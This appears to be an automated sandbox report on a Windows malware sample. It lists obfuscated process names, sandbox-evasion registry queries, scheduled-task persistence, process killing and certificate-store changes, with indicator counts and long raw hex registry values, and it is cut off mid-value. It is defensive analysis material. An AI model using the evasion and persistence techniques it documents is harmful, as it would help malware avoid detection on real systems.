lQk6PJJ6IdIOShPMwmGSQdRe.exe 4880 2216 WerFault.exe SystemSettings.exe 4656 4532 WerFault.exe SystemSettings.exe 3464 2844 WerFault.exe SystemSettings.exe 4220 3712 WerFault.exe AddInProcess.exe 1324 3712 WerFault.exe AddInProcess.exe 2380 1784 WerFault.exe AddInProcess.exe 836 1784 WerFault.exe AddInProcess.exe 4688 1248 WerFault.exe AddInProcess.exe 3464 1248 WerFault.exe AddInProcess.exe 1320 3272 WerFault.exe AddInProcess.exe 3968 1492 WerFault.exe tcsjwaa 3920 3272 WerFault.exe AddInProcess.exe 2456 4632 WerFault.exe AddInProcess.exe 1960 4632 WerFault.exe AddInProcess.exe 2476 380 WerFault.exe AddInProcess.exe 2488 380 WerFault.exe AddInProcess.exe 4396 4952 WerFault.exe AddInProcess.exe 4436 4952 WerFault.exe AddInProcess.exe 2924 3236 WerFault.exe AddInProcess.exe 3392 3236 WerFault.exe AddInProcess.exe -
Checks SCSI registry key(s) 3 TTPs 31 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
SystemSettings.exeSystemSettings.execrsjwaataskmgr.exetaskmgr.exeSystemSettings.exeTue02522f9ea0b1.exeRkeagtomax1.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI crsjwaa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID SystemSettings.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI crsjwaa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID crsjwaa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI crsjwaa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Rkeagtomax1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 crsjwaa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 crsjwaa Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID crsjwaa Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Rkeagtomax1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 SystemSettings.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Rkeagtomax1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 SystemSettings.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exeS4ax8IMw6V0VoIGOVarOFSo6.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 S4ax8IMw6V0VoIGOVarOFSo6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString S4ax8IMw6V0VoIGOVarOFSo6.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4140 schtasks.exe 3840 schtasks.exe 4392 schtasks.exe 4620 schtasks.exe 3996 schtasks.exe 4280 schtasks.exe 4344 schtasks.exe 2356 schtasks.exe 4564 schtasks.exe 2492 schtasks.exe 4980 schtasks.exe 4276 schtasks.exe 4628 schtasks.exe 4180 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 2032 timeout.exe 920 timeout.exe 1720 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 4500 tasklist.exe 4312 tasklist.exe -
Enumerates system info in registry 2 TTPs 13 IoCs
Processes:
chrome.exeInstall.exerundll32.exechrome.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 4380 taskkill.exe 4720 taskkill.exe -
Modifies Control Panel 1 IoCs
Processes:
crsjwaadescription ioc process Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Control Panel\Colors crsjwaa -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeLogonUI.exeAkdHuPQ.exeexplorer.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 AkdHuPQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" AkdHuPQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ AkdHuPQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{435ce73b-0000-0000-0000-d01200000000}\NukeOnDelete = "0" AkdHuPQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing AkdHuPQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache AkdHuPQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix AkdHuPQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" AkdHuPQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer AkdHuPQ.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe -
Modifies registry class 58 IoCs
Processes:
Explorer.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294967295" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1320" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010007000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002c100000000000002000000e60703004100720067006a006200650078002000200033000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000300000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000000f51f27ad134d80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e60703004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000400000073ae2078e323294282c1e41cb67d5b9c000000000000000000000000e8b82935d134d80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b0031004e005000310034005200370037002d0030003200520037002d0034005200350051002d004f003700340034002d00320052004f0031004e00520035003100390038004f0037007d005c0047006e00660078007a00740065002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e607030050004300480020003100370025000d000a005a0072007a00620065006c0020003200350025000d000a005100760066007800200031003000300025000d000a004100720067006a0062006500780020003000250000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000000000000000000000000000000000000000000000000000000000001224fbf24c3cd8015aff8b3c4d3cd8010000000047006e006600780020005a006e0061006e00740072006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c00470072007a0063005c0037004d0076006300460073006b002e003000300030005c00460067006e002e0072006b0072002e0063007600730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000e60703004e006800670062005600670020002d00200049000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000005fa8c47b4b3cd801dca3922e4c3cd80100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e0000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a00760061007